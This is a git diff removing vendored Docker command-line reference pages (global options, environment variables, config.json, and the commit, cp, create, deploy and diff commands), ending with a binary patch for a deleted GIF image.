- -Options: - --config string Location of client config files (default "/root/.docker") - -D, --debug Enable debug mode - --help Print usage - -H, --host value Daemon socket(s) to connect to (default []) - -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") - --tls Use TLS; implied by --tlsverify - --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") - --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") - --tlskey string Path to TLS key file (default "/root/.docker/key.pem") - --tlsverify Use TLS and verify the remote - -v, --version Print version information and quit - -Commands: - attach Attach to a running container - # […] -``` - -Depending on your Docker system configuration, you may be required to preface -each `docker` command with `sudo`. To avoid having to use `sudo` with the -`docker` command, your system administrator can create a Unix group called -`docker` and add users to it. - -For more information about installing Docker or `sudo` configuration, refer to -the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system. - -## Environment variables - -For easy reference, the following list of environment variables are supported -by the `docker` command line: - -* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`) -* `DOCKER_CONFIG` The location of your client configuration files. -* `DOCKER_CERT_PATH` The location of your authentication keys. -* `DOCKER_DRIVER` The graph driver to use. -* `DOCKER_HOST` Daemon socket to connect to. -* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is - unsuitable for Docker. -* `DOCKER_RAMDISK` If set this will disable 'pivot_root'. -* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote. -* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images. 
- Equates to `--disable-content-trust=false` for build, create, pull, push, run. -* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults - to the same URL as the registry. -* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and - `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are - printed. This may become the default in a future release, at which point this environment-variable is removed. -* `DOCKER_TMPDIR` Location for temporary Docker files. - -Because Docker is developed using Go, you can also use any environment -variables used by the Go runtime. In particular, you may find these useful: - -* `HTTP_PROXY` -* `HTTPS_PROXY` -* `NO_PROXY` - -These Go environment variables are case-insensitive. See the -[Go specification](http://golang.org/pkg/net/http/) for details on these -variables. - -## Configuration files - -By default, the Docker command line stores its configuration files in a -directory called `.docker` within your `$HOME` directory. However, you can -specify a different location via the `DOCKER_CONFIG` environment variable -or the `--config` command line option. If both are specified, then the -`--config` option overrides the `DOCKER_CONFIG` environment variable. -For example: - - docker --config ~/testconfigs/ ps - -Instructs Docker to use the configuration files in your `~/testconfigs/` -directory when running the `ps` command. - -Docker manages most of the files in the configuration directory -and you should not modify them. However, you *can modify* the -`config.json` file to control certain aspects of how the `docker` -command behaves. - -Currently, you can modify the `docker` command behavior using environment -variables or command-line options. You can also use options within -`config.json` to modify some of the same behavior. 
When using these -mechanisms, you must keep in mind the order of precedence among them. Command -line options override environment variables and environment variables override -properties you specify in a `config.json` file. - -The `config.json` file stores a JSON encoding of several properties: - -The property `HttpHeaders` specifies a set of headers to include in all messages -sent from the Docker client to the daemon. Docker does not try to interpret or -understand these header; it simply puts them into the messages. Docker does -not allow these headers to change any headers it sets for itself. - -The property `psFormat` specifies the default format for `docker ps` output. -When the `--format` flag is not provided with the `docker ps` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see the -[**Formatting** section in the `docker ps` documentation](ps.md) - -The property `imagesFormat` specifies the default format for `docker images` output. -When the `--format` flag is not provided with the `docker images` command, -Docker's client uses this property. If this property is not set, the client -falls back to the default table format. For a list of supported formatting -directives, see the [**Formatting** section in the `docker images` documentation](images.md) - -The property `serviceInspectFormat` specifies the default format for `docker -service inspect` output. When the `--format` flag is not provided with the -`docker service inspect` command, Docker's client uses this property. If this -property is not set, the client falls back to the default json format. For a -list of supported formatting directives, see the -[**Formatting** section in the `docker service inspect` documentation](service_inspect.md) - -The property `statsFormat` specifies the default format for `docker -stats` output. 
When the `--format` flag is not provided with the -`docker stats` command, Docker's client uses this property. If this -property is not set, the client falls back to the default table -format. For a list of supported formatting directives, see -[**Formatting** section in the `docker stats` documentation](stats.md) - -Once attached to a container, users detach from it and leave it running using -the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable -using the `detachKeys` property. Specify a `` value for the -property. The format of the `` is a comma-separated list of either -a letter [a-Z], or the `ctrl-` combined with any of the following: - -* `a-z` (a single lowercase alpha character ) -* `@` (at sign) -* `[` (left bracket) -* `\\` (two backward slashes) -* `_` (underscore) -* `^` (caret) - -Your customization applies to all containers started in with your Docker client. -Users can override your custom or the default key sequence on a per-container -basis. To do this, the user specifies the `--detach-keys` flag with the `docker -attach`, `docker exec`, `docker run` or `docker start` command. - -Following is a sample `config.json` file: - - {% raw %} - { - "HttpHeaders": { - "MyHeader": "MyValue" - }, - "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", - "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", - "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}", - "serviceInspectFormat": "pretty", - "detachKeys": "ctrl-e,e" - } - {% endraw %} - -### Notary - -If using your own notary server and a self-signed certificate or an internal -Certificate Authority, you need to place the certificate at -`tls//ca.crt` in your docker config directory. - -Alternatively you can trust the certificate globally by adding it to your system's -list of root Certificate Authorities. - -## Help - -To list the help on any command just execute the command, followed by the -`--help` option. 
- - $ docker run --help - - Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] - - Run a command in a new container - - Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - ... - -## Option types - -Single character command line options can be combined, so rather than -typing `docker run -i -t --name test busybox sh`, -you can write `docker run -it --name test busybox sh`. - -### Boolean - -Boolean options take the form `-d=false`. The value you see in the help text is -the default value which is set if you do **not** specify that flag. If you -specify a Boolean flag without a value, this will set the flag to `true`, -irrespective of the default value. - -For example, running `docker run -d` will set the value to `true`, so your -container **will** run in "detached" mode, in the background. - -Options which default to `true` (e.g., `docker build --rm=true`) can only be -set to the non-default value by explicitly setting them to `false`: - - $ docker build --rm=false . - -### Multi - -You can specify options like `-a=[]` multiple times in a single command line, -for example in these commands: - - $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash - $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls - -Sometimes, multiple options can call for a more complex value string as for -`-v`: - - $ docker run -v /host:/container example/mysql - -> **Note:** -> Do not use the `-t` and `-a stderr` options together due to -> limitations in the `pty` implementation. All `stderr` in `pty` mode -> simply goes to `stdout`. - -### Strings and Integers - -Options like `--name=""` expect a string, and they -can only be specified once. Options like `-c=0` -expect an integer, and they can only be specified once. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md deleted file mode 100644 index 8f971a5d95..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md +++ /dev/null @@ -1,93 +0,0 @@ ---- -title: "commit" -description: "The commit command description and usage" -keywords: "commit, file, changes" ---- - - - -# commit - -```markdown -Usage: docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] - -Create a new image from a container's changes - -Options: - -a, --author string Author (e.g., "John Hannibal Smith ") - -c, --change value Apply Dockerfile instruction to the created image (default []) - --help Print usage - -m, --message string Commit message - -p, --pause Pause container during commit (default true) -``` - -It can be useful to commit a container's file changes or settings into a new -image. This allows you debug a container by running an interactive shell, or to -export a working dataset to another server. Generally, it is better to use -Dockerfiles to manage your images in a documented and maintainable way. -[Read more about valid image names and tags](tag.md). - -The commit operation will not include any data contained in -volumes mounted inside the container. - -By default, the container being committed and its processes will be paused -while the image is committed. This reduces the likelihood of encountering data -corruption during the process of creating the commit. If this behavior is -undesired, set the `--pause` option to false. - -The `--change` option will apply `Dockerfile` instructions to the image that is -created. 
Supported `Dockerfile` instructions: -`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -## Commit a container - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - $ docker commit c3f279d17e0a svendowideit/testimage:version3 - f5283438590d - $ docker images - REPOSITORY TAG ID CREATED SIZE - svendowideit/testimage version3 f5283438590d 16 seconds ago 335.7 MB - -## Commit a container with new configurations - - {% raw %} - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a - [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin] - $ docker commit --change "ENV DEBUG true" c3f279d17e0a svendowideit/testimage:version3 - f5283438590d - $ docker inspect -f "{{ .Config.Env }}" f5283438590d - [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true] - {% endraw %} - -## Commit a container with new `CMD` and `EXPOSE` instructions - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - - $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a svendowideit/testimage:version4 - f5283438590d - - $ docker run -d svendowideit/testimage:version4 - 89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0 - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - 89373736e2e7 testimage:version4 "apachectl -DFOREGROU" 3 seconds ago Up 2 seconds 80/tcp - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours diff --git 
a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md deleted file mode 100644 index 43156406ec..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -title: "container prune" -description: "Remove all stopped containers" -keywords: container, prune, delete, remove ---- - - - -# container prune - -```markdown -Usage: docker container prune [OPTIONS] - -Remove all stopped containers - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -## Examples - -```bash -$ docker container prune -WARNING! This will remove all stopped containers. -Are you sure you want to continue? [y/N] y -Deleted Containers: -4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063 -f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360 - -Total reclaimed space: 212 B -``` - -## Related information - -* [system df](system_df.md) -* [volume prune](volume_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md deleted file mode 100644 index fcfd35fce1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md +++ /dev/null @@ -1,112 +0,0 @@ ---- -title: "cp" -description: "The cp command description and usage" -keywords: "copy, container, files, folders" ---- - - - -# cp - -```markdown -Usage: docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- - docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH - -Copy files/folders between a container and the local filesystem - -Use '-' as the source to read a tar archive from stdin -and extract it to a directory destination in a container. 
-Use '-' as the destination to stream a tar archive of a -container source to stdout. - -Options: - -L, --follow-link Always follow symbol link in SRC_PATH - --help Print usage -``` - -The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. -You can copy from the container's file system to the local machine or the -reverse, from the local filesystem to the container. If `-` is specified for -either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from -`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. -The `SRC_PATH` or `DEST_PATH` can be a file or directory. - -The `docker cp` command assumes container paths are relative to the container's -`/` (root) directory. This means supplying the initial forward slash is optional; -The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and -`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can -be an absolute or relative value. The command interprets a local machine's -relative paths as relative to the current working directory where `docker cp` is -run. - -The `cp` command behaves like the Unix `cp -a` command in that directories are -copied recursively with permissions preserved if possible. Ownership is set to -the user and primary group at the destination. For example, files copied to a -container are created with `UID:GID` of the root user. Files copied to the local -machine are created with the `UID:GID` of the user which invoked the `docker cp` -command. If you specify the `-L` option, `docker cp` follows any symbolic link -in the `SRC_PATH`. `docker cp` does *not* create parent directories for -`DEST_PATH` if they do not exist. 
- -Assuming a path separator of `/`, a first argument of `SRC_PATH` and second -argument of `DEST_PATH`, the behavior is as follows: - -- `SRC_PATH` specifies a file - - `DEST_PATH` does not exist - - the file is saved to a file created at `DEST_PATH` - - `DEST_PATH` does not exist and ends with `/` - - Error condition: the destination directory must exist. - - `DEST_PATH` exists and is a file - - the destination is overwritten with the source file's contents - - `DEST_PATH` exists and is a directory - - the file is copied into this directory using the basename from - `SRC_PATH` -- `SRC_PATH` specifies a directory - - `DEST_PATH` does not exist - - `DEST_PATH` is created as a directory and the *contents* of the source - directory are copied into this directory - - `DEST_PATH` exists and is a file - - Error condition: cannot copy a directory to a file - - `DEST_PATH` exists and is a directory - - `SRC_PATH` does not end with `/.` - - the source directory is copied into this directory - - `SRC_PATH` does end with `/.` - - the *content* of the source directory is copied into this - directory - -The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above -rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not -the target, is copied by default. To copy the link target and not the link, specify -the `-L` option. - -A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can -also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local -machine, for example `file:name.txt`. If you use a `:` in a local machine path, -you must be explicit with a relative or absolute path, for example: - - `/path/to/file:name.txt` or `./file:name.txt` - -It is not possible to copy certain system files such as resources under -`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by -the user in the container. However, you can still copy such files by manually -running `tar` in `docker exec`. 
For example (consider `SRC_PATH` and `DEST_PATH` -are directories): - - $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - - -or - - $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - - - -Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. -The command extracts the content of the tar to the `DEST_PATH` in container's -filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as -the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md deleted file mode 100644 index e6582e4a38..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/create.md +++ /dev/null @@ -1,211 +0,0 @@ ---- -title: "create" -description: "The create command description and usage" -keywords: "docker, create, container" ---- - - - -# create - -Creates a new container. - -```markdown -Usage: docker create [OPTIONS] IMAGE [COMMAND] [ARG...] - -Create a new container - -Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --blkio-weight-device value Block IO weight (relative device weight) (default []) - --cap-add value Add Linux capabilities (default []) - --cap-drop value Drop Linux capabilities (default []) - --cgroup-parent string Optional parent cgroup for the container - --cidfile string Write the container ID to the file - --cpu-count int The number of CPUs available for execution by the container. - Windows daemon only. On Windows Server containers, this is - approximated as a percentage of total CPU usage. 
- --cpu-percent int CPU percent (Windows only) - --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpus NanoCPUs Number of CPUs (default 0.000) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --device value Add a host device to the container (default []) - --device-read-bps value Limit read rate (bytes per second) from a device (default []) - --device-read-iops value Limit read rate (IO per second) from a device (default []) - --device-write-bps value Limit write rate (bytes per second) to a device (default []) - --device-write-iops value Limit write rate (IO per second) to a device (default []) - --disable-content-trust Skip image verification (default true) - --dns value Set custom DNS servers (default []) - --dns-option value Set DNS options (default []) - --dns-search value Set custom DNS search domains (default []) - --entrypoint string Overwrite the default ENTRYPOINT of the image - -e, --env value Set environment variables (default []) - --env-file value Read in a file of environment variables (default []) - --expose value Expose a port or a range of ports (default []) - --group-add value Add additional groups to join (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) - --help Print usage - -h, --hostname string Container host name - --init Run an init inside the container that forwards signals and reaps processes - --init-path 
string Path to the docker-init binary - -i, --interactive Keep STDIN open even if not attached - --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) - --io-maxiops uint Maximum IOps limit for the system drive (Windows only) - --ip string Container IPv4 address (e.g. 172.30.100.104) - --ip6 string Container IPv6 address (e.g. 2001:db8::33) - --ipc string IPC namespace to use - --isolation string Container isolation technology - --kernel-memory string Kernel memory limit - -l, --label value Set meta data on a container (default []) - --label-file value Read in a line delimited file of labels (default []) - --link value Add link to another container (default []) - --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) - --log-driver string Logging driver for the container - --log-opt value Log driver options (default []) - --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) - --name string Assign a name to the container - --network-alias value Add network-scoped alias for the container (default []) - --network string Connect a container to a network (default "default") - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-healthcheck Disable any container-specified HEALTHCHECK - --oom-kill-disable Disable OOM Killer - --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) - --pid string PID namespace to use - --pids-limit int Tune container pids limit (set -1 for unlimited), kernel >= 4.3 - --privileged Give extended privileges to this container - -p, 
--publish value Publish a container's port(s) to the host (default []) - -P, --publish-all Publish all exposed ports to random ports - --read-only Mount the container's root filesystem as read only - --restart string Restart policy to apply when a container exits (default "no") - Possible values are: no, on-failure[:max-retry], always, unless-stopped - --rm Automatically remove the container when it exits - --runtime string Runtime to use for this container - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. - --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") - --stop-timeout=10 Timeout (in seconds) to stop a container - --storage-opt value Storage driver options for the container (default []) - --sysctl value Sysctl options (default map[]) - --tmpfs value Mount a tmpfs directory (default []) - -t, --tty Allocate a pseudo-TTY - --ulimit value Ulimit options (default []) - -u, --user string Username or UID (format: [:]) - --userns string User namespace to use - 'host': Use the Docker host user namespace - '': Use the Docker daemon user namespace specified by `--userns-remap` option. - --uts string UTS namespace to use - -v, --volume value Bind mount a volume (default []). The format - is `[host-src:]container-dest[:]`. - The comma-delimited `options` are [rw|ro], - [z|Z], [[r]shared|[r]slave|[r]private], and - [nocopy]. The 'host-src' is an absolute path - or a name value. 
- --volume-driver string Optional volume driver for the container - --volumes-from value Mount volumes from the specified container(s) (default []) - -w, --workdir string Working directory inside the container -``` - -The `docker create` command creates a writeable container layer over the -specified image and prepares it for running the specified command. The -container ID is then printed to `STDOUT`. This is similar to `docker run -d` -except the container is never started. You can then use the -`docker start ` command to start the container at any point. - -This is useful when you want to set up a container configuration ahead of time -so that it is ready to start when you need it. The initial status of the -new container is `created`. - -Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details. - -## Examples - - $ docker create -t -i fedora bash - 6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752 - $ docker start -a -i 6d8af538ec5 - bash-4.2# - -As of v1.4.0 container volumes are initialized during the `docker create` phase -(i.e., `docker run` too). For example, this allows you to `create` the `data` -volume container, and then use it from another container: - - $ docker create -v /data --name data ubuntu - 240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57 - $ docker run --rm --volumes-from data ubuntu ls -la /data - total 8 - drwxr-xr-x 2 root root 4096 Dec 5 04:10 . - drwxr-xr-x 48 root root 4096 Dec 5 04:11 .. - -Similarly, `create` a host directory bind mounted volume container, which can -then be used from the subsequent container: - - $ docker create -v /home/docker:/docker --name docker ubuntu - 9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03 - $ docker run --rm --volumes-from docker ubuntu ls -la /docker - total 20 - drwxr-sr-x 5 1000 staff 180 Dec 5 04:00 . - drwxr-xr-x 48 root root 4096 Dec 5 04:13 .. 
- -rw-rw-r-- 1 1000 staff 3833 Dec 5 04:01 .ash_history - -rw-r--r-- 1 1000 staff 446 Nov 28 11:51 .ashrc - -rw-r--r-- 1 1000 staff 25 Dec 5 04:00 .gitconfig - drwxr-sr-x 3 1000 staff 60 Dec 1 03:28 .local - -rw-r--r-- 1 1000 staff 920 Nov 28 11:51 .profile - drwx--S--- 2 1000 staff 460 Dec 5 00:51 .ssh - drwxr-xr-x 32 1000 staff 1140 Dec 5 04:01 docker - -Set storage driver options per container. - - $ docker create -it --storage-opt size=120G fedora /bin/bash - -This (size) will allow to set the container rootfs size to 120G at creation time. -This option is only available for the `devicemapper`, `btrfs`, `overlay2`, -`windowsfilter` and `zfs` graph drivers. -For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, -user cannot pass a size less than the Default BaseFS Size. -For the `overlay2` storage driver, the size option is only available if the -backing fs is `xfs` and mounted with the `pquota` mount option. -Under these conditions, user can pass any size less then the backing fs size. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the -daemon is running on Windows server, or `hyperv` if running on Windows client. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. 
| - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md deleted file mode 100644 index 53074b2fd4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md +++ /dev/null @@ -1,101 +0,0 @@ ---- -title: "deploy" -description: "The deploy command description and usage" -keywords: "stack, deploy" -advisory: "experimental" ---- - - - -# deploy (alias for stack deploy) (experimental) - -```markdown -Usage: docker deploy [OPTIONS] STACK - -Deploy a new stack or update an existing stack - -Aliases: - deploy, up - -Options: - --bundle-file string Path to a Distributed Application Bundle file - --compose-file string Path to a Compose file - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Create and update a stack from a `compose` or a `dab` file on the swarm. This command -has to be run targeting a manager node. - -## Compose file - -The `deploy` command supports compose file version `3.0` and above. 
- -```bash -$ docker stack deploy --compose-file docker-compose.yml vossibility -Ignoring unsupported options: links - -Creating network vossibility_vossibility -Creating network vossibility_default -Creating service vossibility_nsqd -Creating service vossibility_logstash -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_ghollector -Creating service vossibility_lookupd -``` - -You can verify that the services were correctly created - -``` -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## DAB file - -```bash -$ docker stack deploy --bundle-file vossibility-stack.dab vossibility -Loading bundle from vossibility-stack.dab -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_logstash -Creating service vossibility_lookupd -Creating service vossibility_nsqd -Creating service vossibility_vossibility-collector -``` - -You can verify that the services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 
nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Related information - -* [stack config](stack_config.md) -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md deleted file mode 100644 index be27678dcd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "diff" -description: "The diff command description and usage" -keywords: "list, changed, files, container" ---- - - - -# diff - -```markdown -Usage: docker diff CONTAINER - -Inspect changes on a container's filesystem - -Options: - --help Print usage -``` - -List the changed files and directories in a container᾿s filesystem. - There are 3 events that are listed in the `diff`: - -1. `A` - Add -2. `D` - Delete -3. 
`C` - Change - -For example: - - $ docker diff 7bb0e258aefe - - C /dev - A /dev/kmsg - C /etc - A /etc/mtab - A /go - A /go/src - A /go/src/github.com - A /go/src/github.com/docker - A /go/src/github.com/docker/docker - A /go/src/github.com/docker/docker/.git - .... diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif deleted file mode 100644 index 5894ca270e002758b8f332141e00356e42868880..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 35785 zcmd3tS6CBW*sj+UAPFD|HS{DP9Sl`K#LzngL_|~wh=>J0Kv6{0(5o7H5isItu^ai_j`|%i=(+kus7_0yaNA47>mV; zii%50N=ZvgDgGCEGFeScO+{N+4I~zJ0sDe?UNh-Oink491>4dt5?8J@)TEc<>-SB4TS))R7}c z0#5#yKqfOd`M>PV%*@Kl3O{@HU~X<+Ufw^&#nBi3%dyJJnwpvuwY8_3nwp!NnU^mo zUHLC*U0uDsy_wgqpX=`*930FU9?l;hpO}~^zIX4!ga2}IX6DJ0Csj|M*3QpAfByX4 zyLXpAd{|yy{`>du|2*{nFBkF;6bpbi(EIO({u>h@vdW|Ct&fR;w$@>qcrXN0&a7xY`c7GB^N@v$7r*be2ujX3j+*UQ5MKnGzH`-P`a-L+DspQgL zGnS{dwQ1K_d+kIKblEGe4Lvr5kv=tL^y+OUu+{sPO3R{P3jf$h&{<^j`b)jGH8?>Uq8E^YhU>-JrYIyO&?{s@*Pn_VvWv z_lWH>Csg%*|HL26QuVrV{m1f~v5S%Y)nhTK7CHdXxe$t5S$_BI-p!k_Hdo!P=s$)1P1V~&Y2{vtmfPxsbkVUvk#Wq3)V zblS@z#%UJ_atYsYPfC=^u`fQ`zwwmz6AA*M20sQ|*mJPFTPjiA=v9PmEZ&PE&>0@3;FcQ8sU0l3ENxQ{Cq1 